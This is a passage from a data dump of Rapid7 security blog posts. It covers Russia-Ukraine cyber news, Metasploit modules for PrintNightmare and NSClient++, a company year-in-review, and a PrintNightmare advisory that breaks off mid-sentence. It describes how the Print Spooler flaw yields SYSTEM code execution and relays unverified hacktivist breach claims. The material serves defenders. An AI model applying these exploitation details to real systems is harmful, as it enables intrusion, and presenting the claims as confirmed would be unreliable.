[announced](<https://www.gov.pl/web/diplomacy/statement-of-the-minister-of-foreign-affairs-of-the-republic-of-poland-in-connection-with-the-statement-by-the-us-secretary-of-state-on-providing-airplanes-to-ukraine>) they are ready to deploy \u2014 immediately and free of charge \u2014 all their MIG-29 jets to the Ramstein Air Force base and place them at the disposal of the US government.\n\nLumen [announced](<https://news.lumen.com/RussiaUkraine>) they are immediately ceasing their limited operations in Russia and will no longer provide services to local Lumen enterprise customers.\n\nMcDonald\u2019s [announced](<https://www.cnbc.com/2022/03/08/mcdonalds-will-temporarily-close-850-restaurants-in-russia-nearly-2-weeks-after-putin-invaded-ukraine.html>) they have temporarily closed 850 restaurants in Russia in response to Russia\u2019s attack on Ukraine.\n\nStarbucks [has announced](<https://www.cnbc.com/2022/03/08/starbucks-suspends-all-business-in-russia-as-putins-forces-attack-ukraine.html>) they will be suspending all business in Russia in response to Russia\u2019s attack on Ukraine.\n\n**Threat Intelligence Update**\n\n * ******52 US organizations were impacted by RagnarLocker ransomware****,**** including critical infrastructures******\n\nThe FBI reported that as of January 2021, 52 US-based organizations, some related to critical infrastructure, were affected by RagnarLocker ransomware. The industries affected include manufacturing, energy, financial services, government, and information technology. The malware code excludes execution on post-Soviet Union countries, including Russia, based on a geolocation indicator embedded in its code.\n\n_Source: [FBI FLASH](<https://www.ic3.gov/Media/News/2022/220307.pdf>) _\n\n_Available in Threat Library as: Ragnar Locker_\n\n * ******US energy companies were attacked prior to the Russian invasion to Ukraine******\n\nDuring a two-week blitz in mid-February, hackers received access to dozens of computers belonging to multiple US-based energy companies, including [Chevron Corp.](<https://www.bloomberg.com/quote/CVX:US>), [Cheniere Energy Inc.](<https://www.bloomberg.com/quote/LNG:US>), and [Kinder Morgan Inc](<https://www.bloomberg.com/quote/KMI:US>). The companies were attacked in parallel to the Russian invasion of Ukraine.\n\n_Source: [Bloomberg](<https://www.bloomberg.com/news/articles/2022-03-07/hackers-targeted-u-s-lng-producers-in-run-up-to-war-in-ukraine>)_\n\n * **European officials were hacked by Chinese threat actors amid the conflict in Ukraine**\n\nAccording to Google and Proofpoint, a cyberattack was launched by the Chinese hacking group Mustang Panda and its affiliated group RedDelta, which usually targets Southeast Asian countries. The groups managed to gain access to an unidentified European NATO-member email account and spread malware to other diplomatic offices.\n\n_Source: [Forbes](<https://www.forbes.com/sites/thomasbrewster/2022/03/08/chinese-hackers-ramp-up-europe-attacks-in-time-with-russia-ukraine-war/?sh=6077d22f5ee1>)_\n\n_Available in Threat Library as: Mustang Panda_ \n\n\n * ******#OpAmerica: DEVLIX_EU, a pro-Russian hacktivist group, and its affiliates claim to have gained access to terabytes of US sensitive data ******\n\nThe group claims they have obtained access to 92TB of data related to the US Army. According to the group, they also hacked into four of the biggest \u201chosts\u201d in the US and 49 TB of data. As of now, there is no real evidence for the attack provided by the group.\n\n_Source: @Ex_anon_W_hater via [Twitter](<https://twitter.com/Ex_anon_W_hater/status/1500858398664888325>)_\n\n## March 7, 2022\n\nNetflix, KPMG, PwC, and EY have [cut ties with local units in Russia,](<https://www.reuters.com/business/netflix-kpmg-pwc-amex-sever-ties-with-russia-2022-03-06/>) and Danone suspended investments in Russia.\n\nThe Russian government has [published a list of foreign states](<https://www.jpost.com/international/article-700559>) that have committed \u201cunfriendly actions\u201d against \u201cRussia, Russian companies, and citizens.\u201d Countries listed include Australia, Albania, Andorra, the United Kingdom, the member states of the European Union, Iceland, Canada, Liechtenstein, Micronesia, Monaco, New Zealand, Norway, Republic of Korea, San Marino, North Macedonia, Singapore, USA, Taiwan, Ukraine, Montenegro, Switzerland, and Japan.\n\nThe Russian government\u2019s Ministry of Digital [issued orders](<https://www.kommersant.ru/doc/5249500>) for all government websites to use only domestic hosting providers and DNS. They further instructed agencies to discontinue using non-Russian third-party tooling, such as Google Analytics.\n\nTikTok is [suspending content from Russia](<https://www.buzzfeednews.com/article/krystieyandoli/tiktok-russia-suspending-media>) in response to the country cracking down on reporting about the invasion of Ukraine.\n\n**Threat Intelligence Update**\n\n * **Anonymous-affiliated threat actor claims to have hacked and shut down water infrastructure in Russia**\n\nThe AnonGhost group claims to have hacked and shut down two Russian SCADA water supply systems impacting the Russian cities: Volkhov, Boksitogorsk, Luga, Slantsevsky, Tikhvinsky, and Vyborg.\n\n_Source: @darkowlcyber via [Twitter](<https://twitter.com/darkowlcyber/status/1500552186735910915?s=20&t=zXmKgw6Om_VQMHa6XmN6RQ>)_\n\n_Available in Threat Library as: AnonGhost (for Threat Command customers who want to learn more)_ \n\n\n * **Anonymous claims to hack Russian TV services to broadcast footage of the war with Ukraine**\n\nRussian live TV channels Russia 24, Channel One, and Moscow 24, as well as Wink and Ivi, Netflix like services, have been hacked to broadcast footage of the war with Ukraine according to Anonymous.\n\n_Source: @YourAnonNews via [Twitter](<https://twitter.com/YourAnonNews/status/1500613013510008836?s=20&t=qgOO0Uu5T2UrkqdbjEJeAg>)_\n\n## March 4, 2022\n\nThe NATO Cooperative Cyber Defence Center of Excellence (CCDCOE) announced that [Ukraine will join the group](<https://news.yahoo.com/ukraine-join-nato-cyber-defence-171835083.html>) as a \u201ccontributing participant,\u201d indicating that \u201cUkraine could bring valuable first-hand knowledge of several adversaries within the cyber domain to be used for research, exercises, and training.\u201d\n\nUkraine\u2019s deputy chief of their information protection service [noted in a Friday briefing](<https://www.bloomberg.com/news/articles/2022-03-04/ukraine-s-hacker-army-said-to-be-helped-by-400-000-supporters>) that over 400,000 individuals have volunteered to help a crowdsourced Ukrainian government effort to disrupt Russian government and military targets.\n\n**Threat Intelligence Update**\n\n * ******Russia blocked access to social media platforms and Western news sites******\n\nRussia has prevented its residents access to information channels, including Facebook, Twitter, Western news sites such as the BBC, and app stores. With that, the BBC is now providing access to its website via the Dark Web and has reinstated their BBC shortwave broadcast service.\n\n_Source: [Reuters](<https://www.reuters.com/business/russias-offer-foreign-firms-stay-leave-or-hand-over-keys-2022-03-04/>)_\n\n * **Anonymous-affiliated threat actor hacked and leaked data from the Russian Federal State Budgetary Institution of Science**\n\nThe Russian Federal Guard Service of the Russian Federation was hacked by Anonymous. The hacker published leaked names, usernames, emails, and hashed passwords of people from the institution.\n\n_Source: @PucksReturn via [Twitter](<https://twitter.com/PucksReturn/status/1499757796526542855?s=20&t=LQqanSu2v7L5ONAkpZT1PA>)_\n\n * **Anonymous takes down multiple Russian government websites**\n\nAnonymous claims responsibility for the takedown of a large number of Russian Government websites including one of the main government websites, gov.ru. Most of the websites are still down as of Friday afternoon, March 4.\n\n_Source: @Anonynewsitaly via [Twitter](<https://twitter.com/Anonynewsitaly/status/1499488100405362694?s=20&t=92-u27VSsZLoTAz1KtuOKA>)_\n\n## March 3, 2022\n\n**Additional sanctions:** The US Treasury Dept. [announced another round of sanctions](<https://home.treasury.gov/news/press-releases/jy0628>) on Russian elites, as well as many organizations it characterized as outlets of disinformation and propaganda.\n\n**Public policy:** The Russia-Ukraine conflict is adding momentum to cybersecurity regulatory actions. Most recently, that includes\n\n * **[Incident reporting law](<https://www.hsgac.senate.gov/media/majority-media/senate-passes-peters-and-portman-landmark-legislative-package-to-strengthen-public-and-private-sector-cybersecurity->): **Citing the need to defend against potential retaliatory attacks from Russia, the US Senate passed a bill to require critical infrastructure owners and operators to report significant cybersecurity incidents to CISA, as well as ransomware payments. The US House is now considering fast-tracking this bill, which means it may become law quite soon.\n * **[FCC inquiry on BGP security](<https://www.fcc.gov/document/fcc-launches-inquiry-internet-routing-vulnerabilities>): **\u201c[E]specially in light of Russia\u2019s escalating actions inside of Ukraine,\u201d FCC seeks comment on vulnerabilities threatening the Border Gateway Protocol (BGP) that is central to the Internet\u2019s global routing system.\n\n**CISA threat advisory:** CISA [recently reiterated](<https://twitter.com/CISAJen/status/1499117064006639617?s=20&t=9UfrQnQTUg43QsbKoQOhJA>) that it has no specific, credible threat against the U.S. at this time. It continues to point to its [Shields Up](<https://www.cisa.gov/shields-up>) advisory for resources and updates related to the Russia-Ukraine conflict.\n\n**Threat Intelligence Update**\n\n * ******An Anonymous-affiliated hacking group claims to have hacked a branch Russian Military and Rosatom, the Russian State Atomic Energy Corporation****.**\n\nThe hacktivist group Anonymous and its affiliate have hacked and leaked access to the phone directory of the military prosecutor's office of the southern military district of Russia, as well as documents from the Rosatom State Atomic Energy Corporation.\n\n_Available in Threat Library as: OpRussia 2022 (for Threat Command customers who want to learn more)_\n\n * ******A threat actor supporting Russia claims to have hacked and leaked sensitive information related to the Ukrainian military****.**\n\nThe threat actor \u201cLenovo\u201d claims to have hacked a branch of the Ukrainian military and leaked confidential information related to its soldiers. The information was published on an underground Russian hacking forum.\n\n_Source: XSS forum (discovered by our threat hunters on the dark web)_ \n\n\n * ******An Anonymous hacktivist associated group took down the popular Russian news website lenta.ru******\n\nAs part of the OpRussia cyber-attack campaign, an Anonymous hacktivist group known as \u201cEl_patron_real\u201d took down one of the most popular Russian news websites, **lenta.ru**. As of Thursday afternoon, March 3, the website is still down.\n\n_Available in Threat Library as: El_patron_real (for Threat Command customers who want to learn more)_\n\n_**Additional reading:**_\n\n * [_Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict_](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>)\n * [_Russia/Ukraine Conflict: What Is Rapid7 Doing to Protect My Organization?_](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/>)\n * [_Staying Secure in a Global Cyber Conflict_](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/>)\n * [_Prudent Cybersecurity Preparation for the Potential Russia-Ukraine Conflict_](<https://www.rapid7.com/blog/post/2022/02/15/prudent-cybersecurity-preparation-for-the-potential-russia-ukraine-conflict/>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-04T14:30:00", "type": "rapid7blog", "title": "Russia-Ukraine Cybersecurity Updates", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-04T14:30:00", "id": "RAPID7BLOG:57AB78EC625B6F8060F1E6BD668BDD0C", "href": "https://blog.rapid7.com/2022/03/04/russia-ukraine-cybersecurity-updates/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-09T18:55:38", "description": "## PrintNightmare\n\n![Metasploit Wrap-up](https://blog.rapid7.com/content/images/2021/07/metasploit-blg-2-small-1.png)\n\nRapid7 security researchers [Christophe De La Fuente](<https://github.com/cdelafuente-r7>), and [Spencer McIntyre](<https://github.com/zeroSteiner>), have added a new module for [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), dubbed PrintNightmare. This module builds upon the research of Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0. The module triggers a remote DLL load by abusing a vulnerability in the Print Spooler service. The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request using the MS-RPRN vector, resulting in remote code execution as `NT AUTHORITY\\SYSTEM`.\n\nBecause Metasploit's SMB server doesn't support SMB3 (yet), it's highly recommended to use an external SMB server like Samba that supports SMB3. The [Metasploit module documentation](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.md>) details the process of generating a payload DLL and using this module to load it.\n\n[CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>) is being actively exploited in the wild. For more information and a full timeline, see [Rapid7\u2019s blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)!\n\n## NSClient++\n\nGreat work by community contributor [Yann Castel](<https://github.com/Hakyac>) on their new NSClient++ module. This module allows an attacker with an unprivileged windows account to gain admin access on a windows system and start a shell.\n\nFor this module to work, both the web interface of NSClient++ and the `ExternalScripts` feature should be enabled. You must also know where the NSClient config file is as it is used to read the admin password which is stored in clear text.\n\n## New module content (2)\n\n * [Print Spooler Remote DLL Injection](<https://github.com/rapid7/metasploit-framework/pull/15385>) by Christophe De La Fuente, Piotr Madej, Spencer McIntyre, Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0, which exploits [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>) \\- A new module has been added to Metasploit to exploit PrintNightmare, aka CVE-2021-1675/CVE-2021-34527, a Remote Code Execution vulnerability in the Print Spooler service of Windows. Successful exploitation results in the ability to load and execute an attacker controlled DLL as the `SYSTEM` user.\n\n * [NSClient++ 0.5.2.35 - Privilege escalation](<https://github.com/rapid7/metasploit-framework/pull/15318>) by BZYO, Yann Castel and kindredsec - This post module allows an attacker to perform a privilege escalation on a machine running a vulnerable version of NSClient++. The module retrieves the admin password from a config file at a customizable path, and so long as NSClient++ has both the web interface and ExternalScriptsfeature enabled, gains a SYSTEM shell.\n\n## Enhancements and features\n\n * [#15366](<https://github.com/rapid7/metasploit-framework/pull/15366>) from [pingport80](<https://github.com/pingport80>) \\- This updates how the msfconsole's history file is handled. It adds a size limitation so the number of commands does not grow indefinitely and fixes a locking condition that would occur when the history file had grown exceptionally large (~400,000 lines or more).\n\n## Bugs fixed\n\n * [#15320](<https://github.com/rapid7/metasploit-framework/pull/15320>) from [agalway-r7](<https://github.com/agalway-r7>) \\- A bug has been fixed in the `read_file` method of `lib/msf/core/post/file.rb` that prevented PowerShell sessions from being able to use the `read_file()` method. PowerShell sessions should now be able to use this method to read files from the target system.\n * [#15371](<https://github.com/rapid7/metasploit-framework/pull/15371>) from [bcoles](<https://github.com/bcoles>) \\- This fixes an issue in the `apport_abrt_chroot_priv_esc` module where if the `apport-cli` binary was not in the PATH the check method would fail.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from\n\nGitHub:\n\n * [Pull Requests 6.0.51...6.0.52](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-06-30T14%3A00%3A49-05%3A00..2021-07-08T16%3A19%3A37%2B01%3A00%22>)\n * [Full diff 6.0.51...6.0.52](<https://github.com/rapid7/metasploit-framework/compare/6.0.51...6.0.52>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.\n\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the\n\n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-07-09T17:53:41", "type": "rapid7blog", "title": "Metasploit Wrap-up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-09T17:53:41", "id": "RAPID7BLOG:8DADA7B6B3B1BA6ED3D6EDBA37A79204", "href": "https://blog.rapid7.com/2021/07/09/metasploit-wrap-up-120/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T19:04:19", "description": "![Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors](https://blog.rapid7.com/content/images/2022/01/rapid7-2021-wrapup.jpg)\n\nNow that 2022 is fully underway, it's time to wrap up some of the milestones that Rapid7 achieved in 2021. We worked harder than ever last year to help protectors keep their organization's infrastructure secure \u2014 even in the face of [some of the most difficult threats](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>) the security community has dealt with in recent memory. Here's a rundown of some of our biggest moments in that effort from 2021.\n\n## Emergent threats and vulnerability disclosures\n\nAs always, our Research and Emergent Threat Response teams spent countless hours this year tirelessly bringing you need-to-know information about the most impactful late-breaking security exploits and vulnerabilities. Let's revisit some of the highlights.\n\n### Emergent threat reports\n\n * [Widespread Exploitation of Critical Remote Code Execution in Apache Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)\n * [CVE-2021-34527 (PrintNightmare): What You Need to Know](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\n * [GitLab Unauthenticated Remote Code Execution CVE-2021-22205 Exploited in the Wild](<https://www.rapid7.com/blog/post/2021/11/01/gitlab-unauthenticated-remote-code-execution-cve-2021-22205-exploited-in-the-wild/>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n * [Microsoft SAM File Readability CVE-2021-36934: What You Need to Know](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [ProxyShell: More Widespread Exploitation of Microsoft Exchange Servers](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>)\n\n### Vulnerability disclosures\n\n * [CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)](<https://www.rapid7.com/blog/post/2021/09/07/cve-2021-3546-78-akkadian-console-server-vulnerabilities-fixed/>)\n * [Fortinet FortiWeb OS Command Injection](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>)\n * [CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/>)\n\n## Research and policy highlights\n\nThat's not all our Research team was up to in 2021. They also churned out a wealth of content and resources weighing in on issues of industry-wide, national, and international importance.\n\n * We published several reports on the state of cybersecurity, including:\n * Our [2020 Vulnerability Intelligence Report](<https://www.rapid7.com/blog/post/2021/03/11/introducing-the-vulnerability-intelligence-report-50-cves-that-made-headlines-in-2020/>)\n * Our latest [Industry Cyber-Exposure Report (ICER)](<https://www.rapid7.com/blog/post/2021/05/05/rapid7-releases-new-industry-cyber-exposure-report-icer-asx-200/>)\n * Our [2021 Cloud Misconfigurations Report](<https://www.rapid7.com/info/2021-cloud-misconfigurations-research-report/>)\n * We tackled the [hot-button topic of hack back](<https://www.rapid7.com/blog/post/2021/08/10/hack-back-is-still-wack/>) and discussed whether or not the practice is, in fact, wack. (Spoiler: It is.)\n * We unpacked the implications for [cybersecurity in the US Infrastructure Bill](<https://www.rapid7.com/blog/post/2021/08/31/cybersecurity-in-the-infrastructure-bill/>).\n * We highlighted the reasons why we think the [UK's Computer Misuse Act](<https://www.rapid7.com/blog/post/2021/08/12/reforming-the-uks-computer-misuse-act/>) needs some revising.\n * We launched [Project Doppler](<https://www.rapid7.com/research/project-doppler/>), a free tool for Rapid7 customers, developed by our Research team to help organizations get better insight into their public internet exposure.\n\n## The Rapid7 family keeps growing\n\nThroughout 2021, we made some strategic acquisitions to broaden the solutions we offer and help make the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>) the one-stop shop for your security program.\n\n * [We acquired IntSights](<https://www.rapid7.com/blog/post/2021/07/19/rapid7-acquires-intsights/>) to help organizations obtain holistic threat intelligence.\n * [We teamed up with open-source platform Velociraptor](<https://www.rapid7.com/blog/post/2021/04/21/rapid7-and-velociraptor-join-forces/>) to provide teams with better endpoint visibility.\n * [We brought Kubernetes security provider Alcide](<https://www.rapid7.com/blog/post/2021/02/01/rapid7-acquires-leading-kubernetes-security-provider-alcide/>) under the Rapid7 umbrella to add more robust cloud security capabilities to InsightCloudSec.\n\n## Industry accolades\n\nWe're always thrilled to get industry recognition for the work we do helping protectors secure their organizations \u2014 and we had a few big nods to celebrate in 2021.\n\n * Gartner once again [named us a Leader](<https://www.rapid7.com/blog/post/2021/08/23/rapid7-mdr-named-a-market-leader-again/>) in its Magic Quadrant for Managed Detection and Response (MDR).\n * We also earned recognition as a Strong Performer in the [inaugural Forrester Wave for MDR](<https://www.rapid7.com/blog/post/2021/03/24/rapid7-recognized-as-a-strong-performer-in-the-inaugural-forrester-wave-for-mdr-q1-2021/>).\n * InsightIDR was recognized by Gartner us as a [Leader in SIEM](<https://www.rapid7.com/blog/post/2021/07/06/once-again-rapid7-named-a-leader-in-2021-gartner-magic-quadrant-for-siem/>) for the second time in a row.\n * For its 2021 Dynamic Application Security Testing (DAST) Magic Quadrant, Gartner [named us a Visionary](<https://www.rapid7.com/blog/post/2021/06/01/rapid7-named-a-visionary-in-2021-gartner-magic-quadrant-for-application-security-testing/>).\n\n## Keeping in touch\n\nClearly, we had a pretty busy 2021 \u2014 and we have even more planned for 2022. If you need the latest and greatest in security content to tide you over throughout the last few weeks of the year, we have a few ideas for you.\n\n * Listen to the [latest season of Security Nation](<https://www.rapid7.com/blog/series/security-nation/security-nation-season-4/>), our podcast where we chat with amazing guests from all corners of the security community. Season 5 launches later this month!\n * Put the finishing touches on your cybersecurity program for the coming year with insights from our [2022 Planning series](<https://www.rapid7.com/blog/tag/2022-planning/>).\n * Get better acquainted with the latest application security threats with our series on the [OWASP Top 10 for 2021](<https://www.rapid7.com/blog/tag/owasp-top-10-2021/>).\n * Read up on why [InsightIDR was XDR before it was cool to be XDR](<https://www.rapid7.com/blog/post/2021/11/09/insightidr-was-xdr-before-xdr-was-even-a-thing-an-origin-story/>).\n\nStay tuned for more great content, research, and much more in 2022!\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-01-05T18:52:41", "type": "rapid7blog", "title": "Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7387", "CVE-2021-1675", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-34527", "CVE-2021-3546", "CVE-2021-36934", "CVE-2021-44228"], "modified": "2022-01-05T18:52:41", "id": "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "href": "https://blog.rapid7.com/2022/01/05/rapid7-2021-wrap-up-highlights-from-a-year-of-empowering-the-protectors/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-12T14:55:46", "description": "![CVE-2021-34527 \$PrintNightmare\$: What You Need to Know](https://blog.rapid7.com/content/images/2021/06/evil-printer.jpeg)\n\n**Vulnerability note:** This blog originally referenced CVE-2020-1675, but members of the community noted the week of June 29 that the publicly available exploits that purported to exploit CVE-2021-1675 may in fact have been targeting a new vulnerability in the same function as CVE-2021-1675. This was later confirmed, and Microsoft issued a new CVE for what the research community originally thought was CVE-2021-1675. Defenders should now follow guidance and remediation information on the new vulnerability identifier,[CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), instead.\n\nOn June 8, 2021, Microsoft released an advisory and patch for [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) (\u201cPrintNightmare\u201d), a critical vulnerability in the Windows Print Spooler. Although [originally classified](<https://www.rapid7.com/blog/post/2021/06/08/patch-tuesday-june-2021/>) as a privilege escalation vulnerability, security researchers have demonstrated that the vulnerability allows authenticated users to gain remote code execution with SYSTEM-level privileges. On June 29, 2021, as proof-of-concept exploits for the vulnerability began circulating, security researchers discovered that a vulnerability they thought to be CVE-2021-1675 was still exploitable on some systems that had been patched. As of July 1, at least three different proof-of-concept exploits [had been made public](<https://github.com/afwu/PrintNightmare>).\n\nRapid7 researchers confirmed that public exploits worked against fully patched Windows Server 2019 installations as of July 1, 2021. The vulnerable service is enabled by default on Windows Server, with the exception of Windows Server Core. Therefore, it is expected that in the vast majority of enterprise environments, Windows systems are vulnerable to remote code execution by authenticated attackers.\n\nThe vulnerability is in the `RpcAddPrinterDriver` call of the Windows Print Spooler. A client uses the RPC call to add a driver to the server, storing the desired driver in a local directory or on the server via SMB. The client then allocates a `DRIVER_INFO_2` object and initializes a `DRIVER_CONTAINER` object that contains the allocated `DRIVER_INFO_2` object. The `DRIVER_CONTAINER` object is then used within the call to `RpcAddPrinterDriver` to load the driver. This driver may contain arbitrary code that will be executed with SYSTEM privileges on the victim server. This command can be executed by any user who can authenticate to the Spooler service.\n\n## Updates\n\n**9 July 2021**: Microsoft [released revised guidance on CVE-2021-34527](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) the evening of July 8. According to the Microsoft Security Response Center, the out-of-band security update "is working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare. All reports we have investigated have relied on the changing of default registry setting related to Point and Print to an insecure configuration." This is consistent with Microsoft's emphasis earlier in the week that the out-of-band update effectively remediates CVE-2021-34527 **as long as Point and Print is not enabled.**\n\nThe [updated guidance from July 8, 2021](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) also contains revisions to the registry keys that must be set to `0` (or must not be present) in order to ensure that Point and Print is disabled in customer environments. Previously, Microsoft's guidance had been that Point and Print could be disabled by setting the following registry keys to `0` (or ensuring they are not present):\n\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` and\n * `NoWarningNoElevationOnUpdate = 0`\n\n**However, as of July 8, 2021, one of the registry keys that must be set to a 0 (zero) value has changed.** Current guidance is that Point and Print can be disabled by setting the following registry keys to `0` (or ensuring they are not present):\n\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` (DWORD) or not defined (default setting) **and**\n * `UpdatePromptSettings = 0` (DWORD) or not defined (default setting)\n\nWe have updated the `Mitigation Guidance` section in this post to reflect the latest remediation guidance from Microsoft. Further details can still be found in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>).\n\n**7 July 2021**: Microsoft released out-of-band updates for some (but not all) versions of Windows the evening of July 6, 2021. According to Microsoft's updated advisory, "the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as \u201cPrintNightmare\u201d, documented in CVE-2021-34527." Exploitation in the wild has been detected, and ALL Windows systems are affected\u2014not just domain controllers.\n\n**As of July 7, 2021, multiple community researchers have disputed the efficacy of Microsoft's out-of-band fixes for CVE-2021-34527, noting that the local privilege escalation (LPE) vector may not have been addressed, and while the July 6 updates may have remediated the original MS-RPRN vector for remote code execution, RCE is [still possible using MS-PAR](<https://twitter.com/gentilkiwi/status/1411792763478233091>) with Point and Print enabled.** Several prominent researchers have tested ongoing exploitability, including [Will Dormann of CERT/CC](<https://twitter.com/wdormann/status/1412813044279910416>) and Mimikatz developer [Benjamin Delpy](<https://twitter.com/gentilkiwi/status/1412771368534528001>). Dormann [tweeted](<https://twitter.com/wdormann/status/1412813044279910416>) on July 7, 2021 just after noon EDT that "If you have a system where PointAndPrint NoWarningNoElevationOnInstall = 1, then Microsoft's patch for #PrintNightmare CVE-2021-34527 does nothing to prevent either LPE or RCE."\n\nRapid7 researchers have confirmed that Metasploit and other public proof-of-concept code is still able to achieve remote code execution using both MS-RPRN and the UNC path bypass _as long as Point and Print is enabled._ When Point and Print is disabled using the guidance below, public exploit code fails to achieve remote code execution.\n\nTo fully remediate PrintNightmare CVE-2021-34527, Windows administrators should review Microsoft's guidance in in 